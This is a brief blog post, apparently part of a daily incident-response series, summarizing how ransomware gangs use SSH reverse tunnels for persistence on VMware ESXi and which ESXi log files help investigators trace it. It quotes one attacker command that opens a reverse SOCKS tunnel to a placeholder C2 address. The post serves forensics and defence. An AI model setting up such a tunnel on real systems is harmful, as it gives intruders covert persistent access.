030. Ransomware Gangs Use SSH Tunneling for Stealthy Persistence in VMware ESXi infrastructure
Hello everyone! Recently Sygnia shared their insights on how ransomware gangs abuse SSH for stealthy persistence and how to investigate such activity.
To create a tunnel, the threat actors may use SSH binary:
ssh –fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>
From incident response and forensics point of view, the following log files are the most interesting:
- /var/log/shell.log
- /var/log/hostd.log
- /var/log/auth.log
- /var/log/vobd.log
Analysis of these files allows you to uncover lots of interesting events, for example, enabling of SSH access, disabling of firewall rules, SSH authentication into ESXi, etc.
So, if you deal with modern ransomware attacks, being familiar with ESXi forensicating is a must!
See you tomorrow!
Comments
Post a Comment